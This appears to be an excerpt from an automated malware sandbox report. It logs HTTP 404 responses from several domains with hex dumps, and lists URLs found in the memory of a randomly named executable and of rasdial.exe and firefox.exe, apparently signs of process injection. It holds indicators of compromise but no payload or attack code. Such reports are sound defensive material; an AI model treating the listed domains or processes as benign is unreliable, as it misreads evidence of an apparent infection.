            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Sep 2024 07:09:42 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=X2WQeMp3StIMoABJ1Ctz; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:09:56 GMTDate: Mon, 02 Sep 2024 07:09:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 738Last-Modified: Fri, 30 Aug 2024 07:12:48 GMTETag: "2e2-620e151931c8a"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 22 20 68 65 69 67 68 74 3d 22 38 38 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=mYx1wAOx31cidrOiiFli; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:09:58 GMTDate: Mon, 02 Sep 2024 07:09:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=RWKJE3AwJRomtoCjG8b7; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:10:01 GMTDate: Mon, 02 Sep 2024 07:10:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=4F54oIPwlFKf97YFLHjp; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:10:03 GMTDate: Mon, 02 Sep 2024 07:10:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"X-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:10:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:10:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:10:16 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000058D4000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000059C4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2773015874.000000000EFE4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
